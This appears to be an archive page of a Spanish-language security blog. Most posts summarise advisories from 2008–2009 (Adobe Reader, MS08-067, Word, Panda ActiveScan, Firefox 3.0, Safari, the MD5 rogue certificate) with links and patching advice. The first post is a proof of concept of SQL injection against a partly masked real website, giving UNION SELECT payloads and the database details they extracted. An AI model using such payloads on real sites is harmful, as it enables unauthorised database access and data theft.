Archive for the ‘Vulnerabilidades’ Category

Webmedia SQL Injection

julio 15, 2011

Esta aplicacion web presenta una vulnerabilidad de tipo SQL Injection.

Realizamos una PoC de esta vulnerabilidad.

http://www.xxxxxxxxxxx.com/news_body.php?id=99
http://www.xxxxxxxxxxx.com/news_body.php?id='99
http://www.xxxxxxxxxxx.com/news_body.php?id=18' AND 5946=5946
http://www.xxxxxxxxxxx.com/news_body.php?id=-5946'
UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR
(58,98,107,118,58),IFNULL(CAST(CHAR(100,87,84,70,98,77,78,84,105,97)
AS CHAR),CHAR(32)),CHAR(58,120,118,111,58)), NULL, NULL, NULL,
NULL# AND 'MNHP'='MNHP

Efectivamente, el parametro ‘id’ de tipo GET es vulnerable

Realizando el ataque se pueden obtener algunos datos importantes como:

web server operating system: Linux CentOS
web application technology: Apache 2.0.63, PHP 5.1.6
Motor Base de Datos: MySQL 5.0.11
El nombre de la base de datos: trxxxxxeme_com

y acceder a algunas tablas de la DB

[4 tables]
+-----------+
| xxxnds   |
| content   |
| xxxxxfeed |
| products |
+-----------+

Table: products
[5 columns]
+---------+---------------+
| Column | Type |
+---------+---------------+
| bag     | varchar(xxx) |
| brandID | int(11)       |
| name    | varchar(xxx) |
| price   | decimal(xx,2) |
| pxxxID  | int(xx)       |
+---------+---------------+

Vulnerabilidad crítica de Adobe Acrobat y Reader sin solución hasta el 11 de marzo

febrero 24, 2009

Adobe ha afirmado que existe una vulnerabilidad crítica heredada por todas las versiones de Adobe Reader y Acrobat, hasta la actual versión 9. Aunque conocen el problema afirman no actualizar su producto hasta el día 11 de marzo.

Adobe ha informado de que la vulnerabilidad “podría causar que la aplicación fallara y podría potencialmente permitir a un atacante tomar el sistema del equipo afectado“.

Con el aviso, Adobe ha adjuntado una nota en la que informa de los planes que tienen al respecto, en ella comentan que las actualizaciones para la versión 9 tanto de Adobe Reader como de Acrobat llegarán el 11 de marzo de 2009. La actualización para las versiones 8, en unos días después, y posteriormente actualizarán las versiones 7. Mientras tanto, Adobe afirma haber entrado en contacto con marcas de antivirus, como McAfee y Symantec, para asegurar la seguridad de los clientes mutuos.

Teniendo en cuenta las fechas de salida, sería recomendable situarse en primera línea, es decir actualizarse a la versión 9. O bien utilizar opciones gratuitas como son el lector Foxit Reader, o si necesitamos editar, OpenOffice con la extensión para importar PDFs, dado que para exportar lo hace de forma nativa.

Fuente: www.theinquirer.es

Hackers rompieron SSL usando 200 PS3

enero 5, 2009

Un grupo de hackers junto a un grupo de investigación europeo, han logrado dar con una importante debilidad en el algoritmo MD5 que mediante la creacion de un falso certificado de autorizacion (CA) logra pasar por certificado confiable en todos los navegadores.

Lo interesante de esto es que para lograrlo los hackers utilizaron el poder de 200 PlayStation 3 unidos en red y trabajando en paralelo para “romper” la seguridad del SSL.

Usando un cluster de 200 PS3, Alex Sotirov y compañía pudieron experimentar con una técnica avanzada de colisión MD5 , la que será presentada en publico el día de hoy en la conferencia 25C3 en Alemania. Sotirov afirma que la construccion de los CA junto con el ataque DNS de Dan Kaminsky podrian tener consecuencias importantes en toda la internet.

Arjen Lenstra, líder del laboratorio de criptológica EPFL comenta que el objetivo fundamental de esta investigación es mejorar la seguridad en internet con adecuados protocolos, Lenstra también asegura “es imperativo que los navegadores y CAs dejen de usar MD5, y migren a una alternativa mas robusta como SHA-2 y el futuro estándar SHA-3”

Esta noticia sin duda pone a temblar a todo sitio el cual resguarda su seguridad vía SSL, pero también son blanco de critica los navegadores actuales (IE, Mozilla) los cuales permitirían el uso de los falsos certificados de autorización.

Fuente: http://www.chw.net

Vulnerabilidad Critica en Windows

octubre 24, 2008

Microsoft ha publicado un parche de seguridad para corregir la vulnerabilidad zero-Day que afecta a todos sus sistemas operativos, 2000, XP, 2003, Vista y 2008. La vulnerabilidad conocida como MS08-067 está considerada como una vulnerabilidad crítica.

MS08-067 ya ha sido explotado, permite la ejecucion remota de codigo a través del servicio “servidor” de los sistemas operativos Windows

La recomendación es aplicar los parches de seguridad y bloquear los puertos TCP 139 y 145

Mas información:

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

 

ZeroDay en Microsoft Word

julio 9, 2008

Una vulnerabilidad ha sido reportada en Microsoft Word, que pueden ser explotada por personas maliciosas comprometiendo el sistema.

La problema es causado debido a un error aun no especificado, que al ser explotado puede causar corrupción de memoria; para ello el atacante se vale de un documento creado especialmente para explotar esta vulnerabilidad que el usuario ejecuta sin saberlo, permitiendo la ejecucion de codigo arbitrario en sus sistema.

Las versiones afectadas son:

Microsoft Office XP Service Pack 3
Microsoft Word 2002 Service Pack 3

Mas Información:

http://www.frsirt.com/english/advisories/2008/2028/solution
http://www.microsoft.com/technet/security/advisory/953635.mspx

Multiples Vulnerabilidades en Panda ActiveScan

julio 8, 2008

Múltiples vulnerabilidades se han detectado en ActiveScan de Panda Antivirus, podrían ser explotadas por atacantes remotos y tomar control total de los sistemas afectados.

La primera vulnerabilidad es causada por un desbordamiento del búfer del control ActiveX del modulo ActiveScan cuando maneja datos malformados que son transmitidos a través del método “update()”, que puede ser explotada por atacantes remotos, permitiéndoles la ejecución de código arbitrario valiéndose del engaño a un usuario cuando visita una pagina web creada especialmente para este fin, luego de lo cual se ejecutara el código arbitrario.

Panda ActiveScan

La segunda vulnerabilidad es causada por un error de diseño en el control ActiveX ActiveScan cuando procesa URLs para ser utilizadas en el método “update()”, que podría ser explotada por atacantes remotos para descargar e instalar archivos arbitrariamente.

Mas información:

http://www.frsirt.com/english/advisories/2008/2008

ZeroDay en el control ActiveX “Microsoft Access Snapshot Viewer”

julio 7, 2008

El control ActiveX del visor de snapshots de Microsoft Office, especificamente en Microsoft Access presenta una vulnerabilidad, que permite el control remoto del sistema a los atacantes no autenticados y la descarga arbitraria archivos. Este problema es originado por un error de diseño en el control “snapview.ocx”

Snapshop Viewer es suministrado con Office 2000, Office XP y Office 2003, y también puede ser instalado en un sistema que no tiene Microsoft Office.

US-CERT ha reportado esta vulnerabilidad como la VU#837785

Actualmente no se conoce la solución al problema pero US-CERT recomienda leer el aviso de Seguridad de Microsfot (Microsoft Security Advisory 955179) y deshabilitar el control ActiveX de Microsoft Snapshot Viewer en Internet Explorer, actualizar Internet Explorer a la versión 7, asimismo leer el artículo de Microsoft, “Cómo impedir la ejecución de un control ActiveX en Internet Explorer”

Más información:

http://www.kb.cert.org/vuls/id/837785

Referencias de Ayuda y soluciones

http://www.microsoft.com/technet/security/advisory/955179.mspx
http://support.microsoft.com/kb/175274
http://www.us-cert.gov/reading_room/securing_browser/
http://technet.microsoft.com/en-us/library/bb456992.aspx

Productos Adobe Acrobat que usan validación JavaScript presentan vulnerabilidad de Código de Ejecución Arbitraria.

junio 25, 2008

La vulnerabilidad podría ser aprovechada por algún atacante remoto y le permitiría tomar el cotrol total del sistema. El problema es causado por un error inesperado en el método de validación javaScript que podría permitir al atacante a ejecutar código arbitrario, para ello el atacante usa un documento PDF creado especialmente para engañar al usuario que al ser abierto ejecuta el código arbitrario.

Versiones afectadas:

Adobe Reader 8.0
Adobe Reader 7.0.9
Adobe Acrobat Professional 8.0
Adobe Acrobat 3D 8.0
Adobe Acrobat 3D 7.0.9
Adobe Acrobat Standard 8.0
Adobe Acrobat Standard 7.0.9

Solución:

Actualizar su correspondiente versión de Adobe Acrobat

Fuente:
http://www.frsirt.com/english/advisories/2008/1906

Zero Day en Firefox 3.0

junio 19, 2008

A pocas horas del lanzamiento oficial de firefox 3.0, un investigador anónimo evidenció una vulnerabilidad en el navegador Firefox 3.0 recientemente lanzado con bombos y platillos, Download Day incluido.

 Tipping Point ha verificado la vulnerabilidad y lo ha resportado a Mozilla. La vulnerabilidad ha sido reportada como una vulnerabilidad crítica de tipo Zero Day que también afecta a las versiones anteriores.

Aun no se conocen mayores detalles del fallo porque se espera que Mozilla haga publico el parche respectivo que permita corregir el error, solo se sabe que es una vulnerabilidad de tipo “Code Execution”

Pueden ver el reporte original hecho desde Tipping Point Zero Day Initiative

http://dvlabs.tippingpoint.com/blog/2008/06/18/vulnerability-in-mozilla-firefox-30

Aquí la publicacion del Zero Day, (ZDI-CAN-249)

http://www.zerodayinitiative.com/advisories/upcoming/

Al parecer Firefox obtendra dos Record Guiness en simultaneo, la mayor catidad de descargas en un dia y por la vulnerabilidad más rápida en ser descuebierta.

Remote Code Execution en Apple Safari para Windows

junio 2, 2008

Microsoft publico una advertencia de seguridad sobre una vulnerabilidad critica que no ha sido aun corregida, esta vulnerabilidad afecta a Apple Safari instalado instalada en Windows XP o Vista.

La falla es causada por una combinacion de errores en la pagina de descarga por defecto de Apple Safari y con el manejo de ejecutables del escritorio de Windows.

Vulnerabilidad en Safari para windows

Esta vulnerabilidad puede ser aprovechada por atacantes remotos que pueden tomar control total del sistema, permitiendo la ejecucion de codigo malicioso.

Mas informacion:

http://www.microsoft.com/technet/security/advisory/953818.mspx